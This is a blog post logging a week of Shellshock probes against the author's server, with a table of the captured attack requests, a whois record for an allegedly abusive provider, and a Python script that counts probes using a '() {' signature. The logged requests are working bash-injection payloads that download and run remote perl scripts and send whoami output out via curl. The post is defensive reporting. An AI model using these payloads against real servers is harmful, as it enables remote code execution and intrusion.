One week of bash exploits

Bananas has other methods to prevent spammy clients from doing stuff, if the traffic is even genuine to begin with, so in the week after the bash exploit (my blog) no damage was done, and there were twelve attempts by four IP addresses that tried it (my blog). I think I found a crap provider as well.

I have sanitized the URLs so they don't become hrefs.

| who/country | count | what attempted |
|---|---|---|
| us | 4 | `"GET /cgi-bin/helpme HTTP/1.0" "() { :;}; /bin/bash -c \"cd /tmp;wget http:/ /;curl -O /tmp/jurat http:// ; perl /tmp/jurat*;rm -rf /tmp/jurat\""` |
| id | 2 | `"GET /cgi-bin/hi HTTP/1.1" "() { :;};echo efq2ue25qwneth0s63zh$(curl 'http://'; wget -qO- 'http://';)efq2ue25qwneth0s63zh"` |
| us | 3 (7 from provider) | `"GET /cgi-bin/tell HTTP/1.0" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf j* ; wget http:// ; lwp-download http:// ; curl -O /var/tmp/ji http:// ; perl /var/tmp/ji ; rm -rf *ji;rm -rf jur\""` |
| nl | 2 | |


Total 12

`` "GET / HTTP/1.1" "-" "() { :;}; /bin/bash -c \"curl http://\\&whoami=`whoami`\"" ``
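One way to produce a per-address tally like the one above from an access log, as an added example that is not the author's own tooling. It assumes Apache combined log format with `\"`-escaped quotes; the sample lines, their documentation-range IP addresses and the `tally_probes` name are constructed for illustration.

```python
import re
from collections import Counter

# Combined log format (assumed):
#   ip ident user [time] "request" status bytes "referer" "user-agent"
# Apache writes quotes inside a logged header as \" so each quoted field
# is matched as a run of non-quote characters or backslash escapes.
FIELD = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] ' + FIELD + r' \d{3} \S+ '
    + FIELD + ' ' + FIELD
)

# Every probe on this page starts a header value with a bash function
# definition, "() {", so that prefix is the detection signature.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Constructed sample log (not taken from the blog's real logs).
SAMPLE_LOG = r'''
192.0.2.10 - - [01/Oct/2014:10:00:00 +0000] "GET /cgi-bin/helpme HTTP/1.0" 404 209 "-" "() { :;}; /bin/bash -c \"echo constructed\""
192.0.2.10 - - [01/Oct/2014:10:00:05 +0000] "GET /cgi-bin/tell HTTP/1.0" 404 209 "-" "() { :;}; /bin/bash -c \"echo constructed\""
198.51.100.7 - - [02/Oct/2014:11:30:00 +0000] "GET / HTTP/1.1" 200 5120 "() { :;}; echo constructed" "() { :;}; echo constructed"
203.0.113.5 - - [02/Oct/2014:12:00:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''


def tally_probes(lines):
    """Count requests per client IP whose request line, referer or
    user-agent contains the "() {" function-definition prefix."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # blank or unparseable line
        request, referer, agent = m.group(2), m.group(3), m.group(4)
        # Count each request once, even if several fields carry the payload.
        if any(SHELLSHOCK_RE.search(f) for f in (request, referer, agent)):
            hits[m.group("ip")] += 1
    return hits


if __name__ == "__main__":
    hits = tally_probes(SAMPLE_LOG.splitlines())
    for ip, count in hits.most_common():
        print(f"{ip}\t{count}")
    print(f"Total\t{sum(hits.values())}")
```
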

Our latest iffy neighbourhood is

NetRange: -
OriginAS:       AS53850
NetName:        GSI-146-71-96-0
NetHandle:      NET-146-71-96-0-1
Parent:         NET-146-0-0-0-0
NetType:        Direct Allocation
Comment:        Abuse:
Comment:        Billing:
Comment:        Technical Support:
RegDate:        2014-06-18
Updated:        2014-06-18

OrgName:        GorillaServers, Inc.
OrgId:          GORIL-3
Address:        800 S Hope St
Address:        Suite B100
City:           Los Angeles
StateProv:      CA
PostalCode:     90017
Country:        US
RegDate:        2011-01-28
Updated:        2012-03-12

Nothing ran, but I got a new network block

